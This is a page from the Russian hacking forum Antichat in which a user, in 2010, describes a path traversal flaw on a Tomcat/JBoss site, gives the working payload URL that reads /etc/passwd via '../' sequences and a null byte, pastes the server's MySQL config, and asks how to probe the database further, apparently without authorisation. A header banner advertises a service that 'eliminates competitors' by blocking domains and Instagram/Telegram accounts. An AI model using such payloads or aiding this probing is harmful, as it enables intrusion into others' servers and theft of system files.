Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Опции темы

Поиск в этой теме

Опции просмотра

#11

31.07.2010, 00:17

AKYLA

Участник форума

Регистрация: 29.11.2007

Сообщений: 116

С нами:
283596

Репутация: 88

Есть сайт, крутится на apache2 tomcat

Есть уязвимость, заключается в скачивании любых файлов сервака, типа:

Цитата:

Сообщение от None

http://www.site.com/image?file=/../../../../../../../../../../../etc/passwd%00.html

Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое:

Код:

[mysqld_safe] socket		= /var/run/mysqld/mysqld.sock nice		= 0  [mysqld] # # * Basic Settings # user		= mysql pid-file	= /var/run/mysqld/mysqld.pid socket		= /var/run/mysqld/mysqld.sock port		= 3306 basedir		= /usr datadir		= /var/lib/mysql tmpdir		= /tmp language	= /usr/share/mysql/english skip-external-locking
!includedir /etc/mysql/conf.d/

логи не ведутся.

Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход

Home

Help

Terms and Rules